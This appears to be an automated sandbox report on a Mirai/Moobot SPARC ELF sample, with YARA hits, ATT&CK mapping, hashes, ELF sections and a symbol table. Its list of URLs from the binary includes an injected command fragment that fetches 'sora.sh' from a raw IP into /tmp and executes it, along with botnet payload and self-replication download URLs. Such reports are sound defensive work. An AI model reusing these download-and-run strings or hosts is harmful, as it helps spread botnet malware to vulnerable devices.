Source: 86xklcDnGU.elf, 6223.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.00007fff0480b000.00007fff0482c000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/86xklcDnGU.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/86xklcDnGU.elf
Source: 86xklcDnGU.elf, 6223.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.00007fff0480b000.00007fff0482c000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sparc

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 86xklcDnGU.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR

Yara detected Moobot

Source: Yara match	File source: 86xklcDnGU.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 86xklcDnGU.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR

Yara detected Moobot

Source: Yara match	File source: 86xklcDnGU.elf, type: SAMPLE
Source: Yara match	File source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	2 Scripting	Path Interception	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
86xklcDnGU.elf	56%	Virustotal		Browse
86xklcDnGU.elf	53%	ReversingLabs	Linux.Trojan.Gafgyt
86xklcDnGU.elf	100%	Avira	EXP/ELF.Mirai.Z.A

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$	86xklcDnGU.elf	false		unknown
http://woshishabi.zzy.rip/x86	86xklcDnGU.elf	false		unknown
http://0.0.0.0/bins/sora.mips;	86xklcDnGU.elf	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	86xklcDnGU.elf	false	URL Reputation: safe	unknown
http://woshishabi.zzy.rip/wget.sh$	86xklcDnGU.elf	false		unknown
http://104.244.74.231/mips	86xklcDnGU.elf	false		unknown
http://104.244.74.231/x86	86xklcDnGU.elf	false		unknown
http://purenetworks.com/HNAP1/	86xklcDnGU.elf	false	URL Reputation: safe	unknown
http://104.244.74.231/jack5tr.selfrep.sh	86xklcDnGU.elf	false		unknown
http://schemas.xmlsoap.org/soap/envelope/	86xklcDnGU.elf	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
Entropy (8bit):	6.2622747039864874
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	86xklcDnGU.elf
File size:	178'277 bytes
MD5:	e3f4deb0a74a97e90b7ebec168ae6a9e
SHA1:	446d068f1ab079dc17960e1039354d019d8765a4
SHA256:	8f85c0f7e7c783069a92967a0ddc6a5557ffd1b1633aa49e10680dca208b4c44
SHA512:	33a7bb81f763201197099a6bb2234409d8341b5c04ea94c51cac3f79b47cb5e6c655cdfb825b03bbae8d98a7a3375a86a7e7b1feefde19c4680aeb42ea445948
SSDEEP:	3072:651BZwCkPa3NVNxCltRLNCBCDE6otPM2cQ4Ph7vj:651BZwCkPa9nxCltR56r6b2cQ4Ph7L
TLSH:	6D047D322A7A5F27C2D6943901F78732B5F35BC536A4810A7EB00E9CBF597A03057B66
File Content Preview:	.ELF...........................4..S......4. ...(......................B...B...............B...B...B....p..8`..............B...B...B.................dt.Q................................@..(....@...................#.....c...`.....!..... ...@.....".........`

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	Sparc
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x101c4
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	4
Section Header Offset:	152504
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	14

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.init	PROGBITS	0x100b4	0xb4	0x1c	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x100d0	0xd0	0x1feec	0x0	0x6	AX	0	0	4
.fini	PROGBITS	0x2ffbc	0x1ffbc	0x14	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x2ffd0	0x1ffd0	0x42c8	0x0	0x2	A	0	0	8
.eh_frame	PROGBITS	0x44298	0x24298	0x48	0x0	0x3	WA	0	0	4
.tbss	NOBITS	0x442e0	0x242e0	0x8	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x442e0	0x242e0	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x442e8	0x242e8	0x8	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x442f0	0x242f0	0x4	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x442f4	0x242f4	0x18c	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x44480	0x24480	0x288	0x0	0x3	WA	0	0	4
.bss	NOBITS	0x44708	0x24708	0x33f0	0x0	0x3	WA	0	0	8
.comment	PROGBITS	0x0	0x24708	0xc3c	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x25344	0x71	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x25660	0x3680	0x10	0x0		16	305	4
.strtab	STRTAB	0x0	0x28ce0	0x2b85	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000	0x10000	0x24298	0x24298	6.2649	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x24298	0x44298	0x44298	0x470	0x3860	4.3765	0x6	RW	0x10000	.eh_frame .tbss .ctors .dtors .jcr .got .data .bss
TLS	0x242e0	0x442e0	0x442e0	0x0	0x8	0.0000	0x4	R	0x4	.tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x100b4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x100d0	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x2ffbc	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x2ffd0	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x44298	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x442e0	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x442e0	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x442e8	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x442f0	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x442f4	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x44480	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x44708	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	13
.LLC3	.symtab	0x33ec0	0	NOTYPE	<unknown>	DEFAULT	4
.rem	.symtab	0x23e3c	44	FUNC	<unknown>	DEFAULT	2
.udiv	.symtab	0x23e1c	20	FUNC	<unknown>	DEFAULT	2
.umul	.symtab	0x23e30	12	FUNC	<unknown>	DEFAULT	2
.urem	.symtab	0x23dfc	32	FUNC	<unknown>	DEFAULT	2
C.23.5636	.symtab	0x33168	24	OBJECT	<unknown>	DEFAULT	4
GET_UID	.symtab	0x47688	1	OBJECT	<unknown>	DEFAULT	12
LOCAL_ADDR	.symtab	0x47684	4	OBJECT	<unknown>	DEFAULT	12
_Exit	.symtab	0x24034	128	FUNC	<unknown>	DEFAULT	2
_GLOBAL_OFFSET_TABLE_	.symtab	0x442f4	0	OBJECT	<unknown>	HIDDEN	10
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x442e4	0	OBJECT	<unknown>	DEFAULT	7
__CTOR_LIST__	.symtab	0x442e0	0	OBJECT	<unknown>	DEFAULT	7
__C_ctype_b	.symtab	0x44618	4	OBJECT	<unknown>	DEFAULT	11
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x33eec	768	OBJECT	<unknown>	DEFAULT	4
__DTOR_END__	.symtab	0x442ec	0	OBJECT	<unknown>	DEFAULT	8
__DTOR_LIST__	.symtab	0x442e8	0	OBJECT	<unknown>	DEFAULT	8
__EH_FRAME_BEGIN__	.symtab	0x44298	0	OBJECT	<unknown>	DEFAULT	5
__FRAME_END__	.symtab	0x442dc	0	OBJECT	<unknown>	DEFAULT	5
__GI___C_ctype_b	.symtab	0x44618	4	OBJECT	<unknown>	HIDDEN	11
__GI___close	.symtab	0x2a808	124	FUNC	<unknown>	HIDDEN	2
__GI___close_nocancel	.symtab	0x2a814	32	FUNC	<unknown>	HIDDEN	2
__GI___ctype_b	.symtab	0x4461c	4	OBJECT	<unknown>	HIDDEN	11
__GI___errno_location	.symtab	0x24864	36	FUNC	<unknown>	HIDDEN	2
__GI___fcntl_nocancel	.symtab	0x23e70	196	FUNC	<unknown>	HIDDEN	2
__GI___fgetc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	HIDDEN	2
__GI___glibc_strerror_r	.symtab	0x27810	32	FUNC	<unknown>	HIDDEN	2
__GI___libc_close	.symtab	0x2a808	124	FUNC	<unknown>	HIDDEN	2
__GI___libc_fcntl	.symtab	0x23f34	248	FUNC	<unknown>	HIDDEN	2
__GI___libc_open	.symtab	0x2a884	132	FUNC	<unknown>	HIDDEN	2
__GI___libc_read	.symtab	0x2a98c	132	FUNC	<unknown>	HIDDEN	2
__GI___libc_write	.symtab	0x2a908	132	FUNC	<unknown>	HIDDEN	2
__GI___open	.symtab	0x2a884	132	FUNC	<unknown>	HIDDEN	2
__GI___open_nocancel	.symtab	0x2a890	32	FUNC	<unknown>	HIDDEN	2
__GI___read	.symtab	0x2a98c	132	FUNC	<unknown>	HIDDEN	2
__GI___read_nocancel	.symtab	0x2a998	32	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_fini	.symtab	0x2ac30	168	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_init	.symtab	0x2ad2c	92	FUNC	<unknown>	HIDDEN	2
__GI___write	.symtab	0x2a908	132	FUNC	<unknown>	HIDDEN	2
__GI___write_nocancel	.symtab	0x2a914	32	FUNC	<unknown>	HIDDEN	2
__GI___xpg_strerror_r	.symtab	0x27838	300	FUNC	<unknown>	HIDDEN	2
__GI__exit	.symtab	0x24034	128	FUNC	<unknown>	HIDDEN	2
__GI_abort	.symtab	0x290c0	280	FUNC	<unknown>	HIDDEN	2
__GI_accept	.symtab	0x279f4	96	FUNC	<unknown>	HIDDEN	2
__GI_atoi	.symtab	0x2ee9c	24	FUNC	<unknown>	HIDDEN	2
__GI_bind	.symtab	0x27a54	36	FUNC	<unknown>	HIDDEN	2
__GI_brk	.symtab	0x2f5bc	88	FUNC	<unknown>	HIDDEN	2
__GI_close	.symtab	0x2a808	124	FUNC	<unknown>	HIDDEN	2
__GI_closedir	.symtab	0x24480	208	FUNC	<unknown>	HIDDEN	2
__GI_config_close	.symtab	0x2c070	64	FUNC	<unknown>	HIDDEN	2
__GI_config_open	.symtab	0x2c0b8	80	FUNC	<unknown>	HIDDEN	2
__GI_config_read	.symtab	0x2bd14	860	FUNC	<unknown>	HIDDEN	2
__GI_connect	.symtab	0x27a78	96	FUNC	<unknown>	HIDDEN	2
__GI_execl	.symtab	0x2f0b0	172	FUNC	<unknown>	HIDDEN	2
__GI_execve	.symtab	0x2f61c	96	FUNC	<unknown>	HIDDEN	2
__GI_exit	.symtab	0x29754	168	FUNC	<unknown>	HIDDEN	2
__GI_fclose	.symtab	0x2c240	860	FUNC	<unknown>	HIDDEN	2
__GI_fcntl	.symtab	0x23f34	248	FUNC	<unknown>	HIDDEN	2
__GI_fflush_unlocked	.symtab	0x2ddd8	992	FUNC	<unknown>	HIDDEN	2
__GI_fgetc	.symtab	0x2d8ac	320	FUNC	<unknown>	HIDDEN	2
__GI_fgetc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	HIDDEN	2
__GI_fgets	.symtab	0x2d9ec	260	FUNC	<unknown>	HIDDEN	2
__GI_fgets_unlocked	.symtab	0x2e318	160	FUNC	<unknown>	HIDDEN	2
__GI_fopen	.symtab	0x2c59c	24	FUNC	<unknown>	HIDDEN	2
__GI_fork	.symtab	0x2a044	1088	FUNC	<unknown>	HIDDEN	2
__GI_fputs_unlocked	.symtab	0x25ba0	60	FUNC	<unknown>	HIDDEN	2
__GI_fseek	.symtab	0x2f8a0	36	FUNC	<unknown>	HIDDEN	2
__GI_fseeko64	.symtab	0x2f8cc	448	FUNC	<unknown>	HIDDEN	2
__GI_fstat	.symtab	0x2b568	116	FUNC	<unknown>	HIDDEN	2
__GI_fwrite_unlocked	.symtab	0x25be4	196	FUNC	<unknown>	HIDDEN	2
__GI_getc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	HIDDEN	2
__GI_getdtablesize	.symtab	0x2b694	40	FUNC	<unknown>	HIDDEN	2
__GI_getegid	.symtab	0x2b6bc	32	FUNC	<unknown>	HIDDEN	2
__GI_geteuid	.symtab	0x2b6dc	32	FUNC	<unknown>	HIDDEN	2
__GI_getgid	.symtab	0x2b6fc	32	FUNC	<unknown>	HIDDEN	2
__GI_getpagesize	.symtab	0x2b724	56	FUNC	<unknown>	HIDDEN	2
__GI_getpid	.symtab	0x2a548	88	FUNC	<unknown>	HIDDEN	2
__GI_getrlimit	.symtab	0x2b764	92	FUNC	<unknown>	HIDDEN	2
__GI_getsockname	.symtab	0x27ad8	36	FUNC	<unknown>	HIDDEN	2
__GI_getuid	.symtab	0x2b7c0	32	FUNC	<unknown>	HIDDEN	2
__GI_inet_addr	.symtab	0x279cc	40	FUNC	<unknown>	HIDDEN	2
__GI_inet_aton	.symtab	0x2ed6c	244	FUNC	<unknown>	HIDDEN	2
__GI_initstate_r	.symtab	0x29544	244	FUNC	<unknown>	HIDDEN	2
__GI_ioctl	.symtab	0x2f684	228	FUNC	<unknown>	HIDDEN	2
__GI_isatty	.symtab	0x2ecd8	32	FUNC	<unknown>	HIDDEN	2
__GI_kill	.symtab	0x240dc	92	FUNC	<unknown>	HIDDEN	2
__GI_listen	.symtab	0x27b28	28	FUNC	<unknown>	HIDDEN	2
__GI_lseek64	.symtab	0x2fef8	124	FUNC	<unknown>	HIDDEN	2
__GI_memchr	.symtab	0x2e438	280	FUNC	<unknown>	HIDDEN	2
__GI_memcpy	.symtab	0x262d4	4212	FUNC	<unknown>	HIDDEN	2
__GI_memmove	.symtab	0x25cf0	1508	FUNC	<unknown>	HIDDEN	2
__GI_mempcpy	.symtab	0x2fe14	32	FUNC	<unknown>	HIDDEN	2
__GI_memrchr	.symtab	0x2e890	256	FUNC	<unknown>	HIDDEN	2
__GI_memset	.symtab	0x2737c	416	FUNC	<unknown>	HIDDEN	2
__GI_mmap	.symtab	0x2b7e8	108	FUNC	<unknown>	HIDDEN	2
__GI_mremap	.symtab	0x2b85c	104	FUNC	<unknown>	HIDDEN	2
__GI_munmap	.symtab	0x2b8cc	92	FUNC	<unknown>	HIDDEN	2
__GI_nanosleep	.symtab	0x2b98c	72	FUNC	<unknown>	HIDDEN	2
__GI_open	.symtab	0x2a884	132	FUNC	<unknown>	HIDDEN	2
__GI_opendir	.symtab	0x24608	228	FUNC	<unknown>	HIDDEN	2
__GI_raise	.symtab	0x2a5a8	264	FUNC	<unknown>	HIDDEN	2
__GI_random	.symtab	0x291f0	108	FUNC	<unknown>	HIDDEN	2
__GI_random_r	.symtab	0x293bc	152	FUNC	<unknown>	HIDDEN	2
__GI_rawmemchr	.symtab	0x2fe34	188	FUNC	<unknown>	HIDDEN	2
__GI_read	.symtab	0x2a98c	132	FUNC	<unknown>	HIDDEN	2
__GI_readdir	.symtab	0x247a4	184	FUNC	<unknown>	HIDDEN	2
__GI_readdir64	.symtab	0x2bc58	188	FUNC	<unknown>	HIDDEN	2
__GI_recv	.symtab	0x27b44	92	FUNC	<unknown>	HIDDEN	2
__GI_recvfrom	.symtab	0x27ba0	96	FUNC	<unknown>	HIDDEN	2
__GI_remove	.symtab	0x248c8	88	FUNC	<unknown>	HIDDEN	2
__GI_rmdir	.symtab	0x2b9dc	88	FUNC	<unknown>	HIDDEN	2
__GI_sbrk	.symtab	0x2ba3c	108	FUNC	<unknown>	HIDDEN	2
__GI_select	.symtab	0x24218	84	FUNC	<unknown>	HIDDEN	2
__GI_send	.symtab	0x27c00	92	FUNC	<unknown>	HIDDEN	2
__GI_sendto	.symtab	0x27c5c	96	FUNC	<unknown>	HIDDEN	2
__GI_setsid	.symtab	0x24274	80	FUNC	<unknown>	HIDDEN	2
__GI_setsockopt	.symtab	0x27cbc	44	FUNC	<unknown>	HIDDEN	2
__GI_setstate_r	.symtab	0x29638	276	FUNC	<unknown>	HIDDEN	2
__GI_sigaction	.symtab	0x2b364	264	FUNC	<unknown>	HIDDEN	2
__GI_sigprocmask	.symtab	0x2bab0	172	FUNC	<unknown>	HIDDEN	2
__GI_sleep	.symtab	0x2a6b8	336	FUNC	<unknown>	HIDDEN	2
__GI_socket	.symtab	0x27ce8	36	FUNC	<unknown>	HIDDEN	2
__GI_sprintf	.symtab	0x24920	52	FUNC	<unknown>	HIDDEN	2
__GI_srandom_r	.symtab	0x29454	232	FUNC	<unknown>	HIDDEN	2
__GI_stat	.symtab	0x242cc	116	FUNC	<unknown>	HIDDEN	2
__GI_strchr	.symtab	0x2e5c4	524	FUNC	<unknown>	HIDDEN	2
__GI_strchrnul	.symtab	0x2e990	260	FUNC	<unknown>	HIDDEN	2
__GI_strcspn	.symtab	0x2ea94	60	FUNC	<unknown>	HIDDEN	2
__GI_strdup	.symtab	0x27964	56	FUNC	<unknown>	HIDDEN	2
__GI_strlen	.symtab	0x27584	120	FUNC	<unknown>	HIDDEN	2
__GI_strncmp	.symtab	0x2ead0	244	FUNC	<unknown>	HIDDEN	2
__GI_strnlen	.symtab	0x275fc	244	FUNC	<unknown>	HIDDEN	2
__GI_strpbrk	.symtab	0x2ec90	72	FUNC	<unknown>	HIDDEN	2
__GI_strrchr	.symtab	0x2e7d0	192	FUNC	<unknown>	HIDDEN	2
__GI_strspn	.symtab	0x2ebc4	84	FUNC	<unknown>	HIDDEN	2
__GI_strstr	.symtab	0x276f0	288	FUNC	<unknown>	HIDDEN	2
__GI_strtok	.symtab	0x279a4	40	FUNC	<unknown>	HIDDEN	2
__GI_strtok_r	.symtab	0x2ec18	120	FUNC	<unknown>	HIDDEN	2
__GI_strtol	.symtab	0x2eeb4	20	FUNC	<unknown>	HIDDEN	2
__GI_sysconf	.symtab	0x29bc8	1140	FUNC	<unknown>	HIDDEN	2
__GI_tcgetattr	.symtab	0x2ecf8	108	FUNC	<unknown>	HIDDEN	2
__GI_time	.symtab	0x24340	40	FUNC	<unknown>	HIDDEN	2
__GI_times	.symtab	0x2bb5c	40	FUNC	<unknown>	HIDDEN	2
__GI_unlink	.symtab	0x2bb8c	88	FUNC	<unknown>	HIDDEN	2
__GI_vfork	.symtab	0x2f15c	76	FUNC	<unknown>	HIDDEN	2
__GI_vsnprintf	.symtab	0x24954	164	FUNC	<unknown>	HIDDEN	2
__GI_wait4	.symtab	0x2bbec	100	FUNC	<unknown>	HIDDEN	2
__GI_wcrtomb	.symtab	0x2c108	76	FUNC	<unknown>	HIDDEN	2
__GI_wcsnrtombs	.symtab	0x2c178	192	FUNC	<unknown>	HIDDEN	2
__GI_wcsrtombs	.symtab	0x2c154	28	FUNC	<unknown>	HIDDEN	2
__GI_write	.symtab	0x2a908	132	FUNC	<unknown>	HIDDEN	2
__JCR_END__	.symtab	0x442f0	0	OBJECT	<unknown>	DEFAULT	9
__JCR_LIST__	.symtab	0x442f0	0	OBJECT	<unknown>	DEFAULT	9
__app_fini	.symtab	0x45118	4	OBJECT	<unknown>	HIDDEN	12
__atexit_lock	.symtab	0x445f4	24	OBJECT	<unknown>	DEFAULT	11
__bss_start	.symtab	0x44708	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__check_one_fd	.symtab	0x2acd8	84	FUNC	<unknown>	DEFAULT	2
__close	.symtab	0x2a808	124	FUNC	<unknown>	DEFAULT	2
__close_nocancel	.symtab	0x2a814	32	FUNC	<unknown>	DEFAULT	2
__ctype_b	.symtab	0x4461c	4	OBJECT	<unknown>	DEFAULT	11
__curbrk	.symtab	0x4767c	4	OBJECT	<unknown>	HIDDEN	12
__deregister_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__do_global_ctors_aux	.symtab	0x2ff74	0	FUNC	<unknown>	DEFAULT	2
__do_global_dtors_aux	.symtab	0x100d0	0	FUNC	<unknown>	DEFAULT	2
__dso_handle	.symtab	0x44480	0	OBJECT	<unknown>	HIDDEN	11
__environ	.symtab	0x45110	4	OBJECT	<unknown>	DEFAULT	12
__errno_location	.symtab	0x24864	36	FUNC	<unknown>	DEFAULT	2
__errno_location.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__exit_cleanup	.symtab	0x44bc0	4	OBJECT	<unknown>	HIDDEN	12
__fcntl_nocancel	.symtab	0x23e70	196	FUNC	<unknown>	DEFAULT	2
__fgetc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	DEFAULT	2
__fini_array_end	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__fini_array_start	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__fork	.symtab	0x2a044	1088	FUNC	<unknown>	DEFAULT	2
__fork_generation_pointer	.symtab	0x47ac8	4	OBJECT	<unknown>	HIDDEN	12
__fork_handlers	.symtab	0x47acc	4	OBJECT	<unknown>	HIDDEN	12
__fork_lock	.symtab	0x44bc4	4	OBJECT	<unknown>	HIDDEN	12
__getdents	.symtab	0x2b5e4	176	FUNC	<unknown>	HIDDEN	2
__getdents64	.symtab	0x2f770	304	FUNC	<unknown>	HIDDEN	2
__getpagesize	.symtab	0x2b724	56	FUNC	<unknown>	DEFAULT	2
__getpid	.symtab	0x2a548	88	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r	.symtab	0x27810	32	FUNC	<unknown>	DEFAULT	2
__glibc_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__h_errno_location	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__init_array_end	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__init_array_start	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__libc_accept	.symtab	0x279f4	96	FUNC	<unknown>	DEFAULT	2
__libc_close	.symtab	0x2a808	124	FUNC	<unknown>	DEFAULT	2
__libc_connect	.symtab	0x27a78	96	FUNC	<unknown>	DEFAULT	2
__libc_disable_asynccancel	.symtab	0x2aa18	196	FUNC	<unknown>	HIDDEN	2
__libc_enable_asynccancel	.symtab	0x2aadc	268	FUNC	<unknown>	HIDDEN	2
__libc_errno	.symtab	0x0	4	TLS	<unknown>	HIDDEN	6
__libc_fcntl	.symtab	0x23f34	248	FUNC	<unknown>	DEFAULT	2
__libc_fork	.symtab	0x2a044	1088	FUNC	<unknown>	DEFAULT	2
__libc_h_errno	.symtab	0x4	4	TLS	<unknown>	HIDDEN	6
__libc_nanosleep	.symtab	0x2b98c	72	FUNC	<unknown>	DEFAULT	2
__libc_open	.symtab	0x2a884	132	FUNC	<unknown>	DEFAULT	2
__libc_read	.symtab	0x2a98c	132	FUNC	<unknown>	DEFAULT	2
__libc_recv	.symtab	0x27b44	92	FUNC	<unknown>	DEFAULT	2
__libc_recvfrom	.symtab	0x27ba0	96	FUNC	<unknown>	DEFAULT	2
__libc_select	.symtab	0x24218	84	FUNC	<unknown>	DEFAULT	2
__libc_send	.symtab	0x27c00	92	FUNC	<unknown>	DEFAULT	2
__libc_sendto	.symtab	0x27c5c	96	FUNC	<unknown>	DEFAULT	2
__libc_setup_tls	.symtab	0x2f284	636	FUNC	<unknown>	DEFAULT	2
__libc_sigaction	.symtab	0x2b364	264	FUNC	<unknown>	DEFAULT	2
__libc_stack_end	.symtab	0x4510c	4	OBJECT	<unknown>	DEFAULT	12
__libc_system	.symtab	0x2b1b0	348	FUNC	<unknown>	DEFAULT	2
__libc_write	.symtab	0x2a908	132	FUNC	<unknown>	DEFAULT	2
__lll_lock_wait_private	.symtab	0x2a49c	172	FUNC	<unknown>	HIDDEN	2
__malloc_consolidate	.symtab	0x28c98	436	FUNC	<unknown>	HIDDEN	2
__malloc_largebin_index	.symtab	0x27d0c	144	FUNC	<unknown>	DEFAULT	2
__malloc_lock	.symtab	0x44518	24	OBJECT	<unknown>	DEFAULT	11
__malloc_state	.symtab	0x47750	888	OBJECT	<unknown>	DEFAULT	12
__malloc_trim	.symtab	0x28be8	176	FUNC	<unknown>	DEFAULT	2
